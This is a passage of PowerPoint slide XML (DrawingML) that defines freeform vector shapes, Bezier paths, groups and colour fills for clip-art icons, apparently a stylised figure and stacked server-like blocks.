                      <a:gd name="T42" fmla="*/ 53 w 254"/>
                      <a:gd name="T43" fmla="*/ 183 h 200"/>
                      <a:gd name="T44" fmla="*/ 111 w 254"/>
                      <a:gd name="T45" fmla="*/ 199 h 200"/>
                      <a:gd name="T46" fmla="*/ 140 w 254"/>
                      <a:gd name="T47" fmla="*/ 177 h 200"/>
                      <a:gd name="T48" fmla="*/ 140 w 254"/>
                      <a:gd name="T49" fmla="*/ 171 h 200"/>
                      <a:gd name="T50" fmla="*/ 140 w 254"/>
                      <a:gd name="T51" fmla="*/ 139 h 200"/>
                      <a:gd name="T52" fmla="*/ 139 w 254"/>
                      <a:gd name="T53" fmla="*/ 98 h 200"/>
                      <a:gd name="T54" fmla="*/ 137 w 254"/>
                      <a:gd name="T55" fmla="*/ 84 h 200"/>
                      <a:gd name="T56" fmla="*/ 136 w 254"/>
                      <a:gd name="T57" fmla="*/ 79 h 200"/>
                      <a:gd name="T58" fmla="*/ 137 w 254"/>
                      <a:gd name="T59" fmla="*/ 84 h 200"/>
                      <a:gd name="T60" fmla="*/ 139 w 254"/>
                      <a:gd name="T61" fmla="*/ 98 h 200"/>
                      <a:gd name="T62" fmla="*/ 145 w 254"/>
                      <a:gd name="T63" fmla="*/ 136 h 200"/>
                      <a:gd name="T64" fmla="*/ 145 w 254"/>
                      <a:gd name="T65" fmla="*/ 137 h 200"/>
                      <a:gd name="T66" fmla="*/ 145 w 254"/>
                      <a:gd name="T67" fmla="*/ 137 h 200"/>
                      <a:gd name="T68" fmla="*/ 145 w 254"/>
                      <a:gd name="T69" fmla="*/ 142 h 200"/>
                      <a:gd name="T70" fmla="*/ 155 w 254"/>
                      <a:gd name="T71" fmla="*/ 165 h 200"/>
                      <a:gd name="T72" fmla="*/ 170 w 254"/>
                      <a:gd name="T73" fmla="*/ 171 h 200"/>
                      <a:gd name="T74" fmla="*/ 223 w 254"/>
                      <a:gd name="T75" fmla="*/ 155 h 200"/>
                      <a:gd name="T76" fmla="*/ 209 w 254"/>
                      <a:gd name="T77" fmla="*/ 119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254" h="200">
                        <a:moveTo>
                          <a:pt x="209" y="119"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="207" y="121"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="184" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="179" y="94"/>
                          <a:pt x="175" y="64"/>
                          <a:pt x="173" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="170" y="36"/>
                          <a:pt x="153" y="30"/>
                          <a:pt x="144" y="27"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="23"/>
                          <a:pt x="110" y="18"/>
                          <a:pt x="96" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="83" y="10"/>
                          <a:pt x="61" y="4"/>
                          <a:pt x="51" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="41" y="0"/>
                          <a:pt x="21" y="4"/>
                          <a:pt x="18" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="16"/>
                          <a:pt x="10" y="56"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                          <a:pt x="3" y="96"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                          <a:pt x="2" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="4" y="116"/>
                          <a:pt x="9" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="121"/>
                          <a:pt x="20" y="120"/>
                          <a:pt x="26" y="119"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                          <a:pt x="33" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="117"/>
                          <a:pt x="35" y="117"/>
                          <a:pt x="36" y="116"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="116"/>
                          <a:pt x="41" y="115"/>
                          <a:pt x="43" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                          <a:pt x="44" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="76"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="41" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="60"/>
                          <a:pt x="44" y="49"/>
                          <a:pt x="44" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="59"/>
                          <a:pt x="43" y="123"/>
                          <a:pt x="43" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="177"/>
                          <a:pt x="47" y="182"/>
                          <a:pt x="53" y="183"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="67" y="186"/>
                          <a:pt x="102" y="197"/>
                          <a:pt x="111" y="199"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="200"/>
                          <a:pt x="138" y="190"/>
                          <a:pt x="140" y="177"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="175"/>
                          <a:pt x="140" y="173"/>
                          <a:pt x="140" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                          <a:pt x="140" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="124"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="92"/>
                          <a:pt x="137" y="87"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="82"/>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="79"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="80"/>
                          <a:pt x="136" y="82"/>
                          <a:pt x="137" y="84"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="93"/>
                          <a:pt x="139" y="98"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="108"/>
                          <a:pt x="142" y="120"/>
                          <a:pt x="145" y="136"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="136"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                          <a:pt x="145" y="137"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                          <a:pt x="145" y="142"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="148" y="154"/>
                          <a:pt x="151" y="161"/>
                          <a:pt x="155" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="169"/>
                          <a:pt x="164" y="170"/>
                          <a:pt x="170" y="171"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="186" y="167"/>
                          <a:pt x="204" y="161"/>
                          <a:pt x="223" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="254" y="147"/>
                          <a:pt x="236" y="110"/>
                          <a:pt x="209" y="119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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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88" name="Freeform 95">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B88E68D-1AC5-4542-83B2-BA3A10DA0A7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440" y="1214"/>
                    <a:ext cx="89" cy="56"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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89" name="Oval 96">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C074A03-1C2C-4CA8-9E55-F4AB3D3845FC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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2429" y="1132"/>
                    <a:ext cx="119" cy="119"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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1617" name="Group 713">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA716740-4A9A-49B1-9842-C58BC2A2B0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19601" y="2024779"/>
              <a:ext cx="2044701" cy="949325"/>
              <a:chOff x="201" y="1911"/>
              <a:chExt cx="1288" cy="598"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1656" name="Freeform 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB006C6-9F7E-4D32-9E72-40422DAD51B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01" y="2163"/>
                <a:ext cx="1288" cy="346"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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657" name="Group 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C97C218E-CCB8-4921-A1F0-D15B7388FF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5" y="1911"/>
                <a:ext cx="997" cy="424"/>
                <a:chOff x="646" y="1826"/>
                <a:chExt cx="3025" cy="1285"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="1658" name="Group 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB62388B-B250-4C92-868E-3AE2F997482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73" y="1826"/>
                  <a:ext cx="1298" cy="1247"/>
                  <a:chOff x="2634" y="1684"/>
                  <a:chExt cx="1298" cy="1247"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1864" name="Freeform 16">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB302E0-C685-452B-82E7-09637F3AC8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634" y="1684"/>
                    <a:ext cx="1298" cy="1247"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 258 w 1535"/>
                      <a:gd name="T1" fmla="*/ 0 h 1472"/>
                      <a:gd name="T2" fmla="*/ 0 w 1535"/>
                      <a:gd name="T3" fmla="*/ 69 h 1472"/>
                      <a:gd name="T4" fmla="*/ 0 w 1535"/>
                      <a:gd name="T5" fmla="*/ 1131 h 1472"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                      <a:gd name="T7" fmla="*/ 1472 h 1472"/>
                      <a:gd name="T8" fmla="*/ 1280 w 1535"/>
                      <a:gd name="T9" fmla="*/ 411 h 1472"/>
                      <a:gd name="T10" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T11" fmla="*/ 343 h 1472"/>
                      <a:gd name="T12" fmla="*/ 258 w 1535"/>
                      <a:gd name="T13" fmla="*/ 0 h 14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535" h="1472">
                        <a:moveTo>
                          <a:pt x="258" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="69"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1131"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="1472"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="411"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1535" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="258" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="6D6D6C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5" name="Freeform 17">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42D901C1-2F53-4A69-BD9C-79486A6576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634" y="2553"/>
                    <a:ext cx="1298" cy="348"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T1" fmla="*/ 342 h 410"/>
                      <a:gd name="T2" fmla="*/ 255 w 1535"/>
                      <a:gd name="T3" fmla="*/ 0 h 410"/>
                      <a:gd name="T4" fmla="*/ 0 w 1535"/>
                      <a:gd name="T5" fmla="*/ 68 h 410"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                      <a:gd name="T7" fmla="*/ 410 h 410"/>
                      <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T9" fmla="*/ 342 h 4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35" h="410">
                        <a:moveTo>
                          <a:pt x="1535" y="342"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="255" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="68"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="410"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1535" y="342"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="303030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6" name="Freeform 18">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4E7478-76B1-4A45-B827-3D8D749241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634" y="2331"/>
                    <a:ext cx="1298" cy="348"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T1" fmla="*/ 342 h 411"/>
                      <a:gd name="T2" fmla="*/ 255 w 1535"/>
                      <a:gd name="T3" fmla="*/ 0 h 411"/>
                      <a:gd name="T4" fmla="*/ 0 w 1535"/>
                      <a:gd name="T5" fmla="*/ 69 h 411"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                      <a:gd name="T7" fmla="*/ 411 h 411"/>
                      <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T9" fmla="*/ 342 h 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35" h="411">
                        <a:moveTo>
                          <a:pt x="1535" y="342"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="255" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="69"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="411"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1535" y="342"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="303030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7" name="Freeform 19">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B117B2-1A3D-4D0C-90C4-1B863092C6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634" y="2104"/>
                    <a:ext cx="1298" cy="347"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T1" fmla="*/ 343 h 411"/>
                      <a:gd name="T2" fmla="*/ 255 w 1535"/>
                      <a:gd name="T3" fmla="*/ 0 h 411"/>
                      <a:gd name="T4" fmla="*/ 0 w 1535"/>
                      <a:gd name="T5" fmla="*/ 69 h 411"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                      <a:gd name="T7" fmla="*/ 411 h 411"/>
                      <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T9" fmla="*/ 343 h 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35" h="411">
                        <a:moveTo>
                          <a:pt x="1535" y="343"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="255" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="69"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="411"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1535" y="343"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="303030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8" name="Freeform 20">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57BE5C47-D351-4BA8-BA87-244FA49E2D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634" y="1879"/>
                    <a:ext cx="1298" cy="348"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T1" fmla="*/ 340 h 408"/>
                      <a:gd name="T2" fmla="*/ 255 w 1535"/>
                      <a:gd name="T3" fmla="*/ 0 h 408"/>
                      <a:gd name="T4" fmla="*/ 0 w 1535"/>
                      <a:gd name="T5" fmla="*/ 68 h 408"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                      <a:gd name="T7" fmla="*/ 408 h 408"/>
                      <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                      <a:gd name="T9" fmla="*/ 340 h 4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35" h="408">
                        <a:moveTo>
                          <a:pt x="1535" y="340"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="255" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="68"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="408"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1535" y="340"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="303030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869" name="Group 21">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5381C854-1585-4D90-81DA-821CC3B18A4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634" y="1741"/>
                    <a:ext cx="1082" cy="1190"/>
                    <a:chOff x="4616" y="1681"/>
                    <a:chExt cx="361" cy="397"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="1871" name="Freeform 22">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B0C5B1-513C-47FD-82E6-79EDBD7177B2}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noEditPoints="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="4616" y="1906"/>
                      <a:ext cx="361" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1280"/>
                        <a:gd name="T1" fmla="*/ 0 h 607"/>
                        <a:gd name="T2" fmla="*/ 0 w 1280"/>
                        <a:gd name="T3" fmla="*/ 264 h 607"/>
                        <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T5" fmla="*/ 607 h 607"/>
                        <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T7" fmla="*/ 342 h 607"/>
                        <a:gd name="T8" fmla="*/ 0 w 1280"/>
                        <a:gd name="T9" fmla="*/ 0 h 607"/>
                        <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T11" fmla="*/ 566 h 607"/>
                        <a:gd name="T12" fmla="*/ 33 w 1280"/>
                        <a:gd name="T13" fmla="*/ 240 h 607"/>
                        <a:gd name="T14" fmla="*/ 33 w 1280"/>
                        <a:gd name="T15" fmla="*/ 42 h 607"/>
                        <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                        <a:gd name="T17" fmla="*/ 368 h 607"/>
                        <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T19" fmla="*/ 368 h 607"/>
                        <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T21" fmla="*/ 566 h 60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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="1280" h="607">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="264"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="607"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="342"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1250" y="566"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="33" y="240"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="33" y="42"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1247" y="368"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="368"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="566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>
                      <a:solidFill>
                        <a:srgbClr val="545554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72" name="Freeform 23">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72C5A15-0A93-4453-BD86-E15BE56A5C97}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noEditPoints="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="4616" y="1831"/>
                      <a:ext cx="361" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1280"/>
                        <a:gd name="T1" fmla="*/ 0 h 607"/>
                        <a:gd name="T2" fmla="*/ 0 w 1280"/>
                        <a:gd name="T3" fmla="*/ 265 h 607"/>
                        <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T5" fmla="*/ 607 h 607"/>
                        <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                        <a:gd name="T7" fmla="*/ 343 h 607"/>
                        <a:gd name="T8" fmla="*/ 0 w 1280"/>
                        <a:gd name="T9" fmla="*/ 0 h 607"/>
                        <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T11" fmla="*/ 565 h 607"/>
                        <a:gd name="T12" fmla="*/ 33 w 1280"/>
                        <a:gd name="T13" fmla="*/ 241 h 607"/>
                        <a:gd name="T14" fmla="*/ 33 w 1280"/>
                        <a:gd name="T15" fmla="*/ 43 h 607"/>
                        <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                        <a:gd name="T17" fmla="*/ 366 h 607"/>
                        <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T19" fmla="*/ 366 h 607"/>
                        <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                        <a:gd name="T21" fmla="*/ 565 h 60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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="1280" h="607">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="265"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="607"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1280" y="343"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1250" y="565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="33" y="241"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="33" y="43"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1247" y="366"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="366"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1250" y="565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>
                      <a:solidFill>
                        <a:srgbClr val="545554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73" name="Freeform 24">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F640E58-2448-4CF8-BB99-5EC755F1E8E1}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr>
                      <a:spLocks noEditPoints="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="4616" y="1756"/>
                      <a:ext cx="361" cy="172"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 1280"/>
                        <a:gd name="T1" fmla="*/ 0 h 607"/>
